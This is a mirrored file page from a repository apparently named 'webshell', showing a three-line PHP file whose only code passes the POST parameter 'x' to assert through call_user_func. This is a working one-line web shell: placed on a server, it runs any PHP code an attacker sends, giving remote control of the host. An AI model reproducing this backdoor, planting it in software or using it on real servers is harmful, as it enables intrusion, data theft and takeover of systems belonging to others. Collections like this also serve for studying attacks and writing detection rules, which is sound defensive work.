mirror of
https://github.com/tennc/webshell
synced 2025-02-16 17:58:23 +00:00
3 lines
51 B
PHP
3 lines
51 B
PHP
<?php
|
|
call_user_func('assert',$_POST['x']);
|
|
?>
|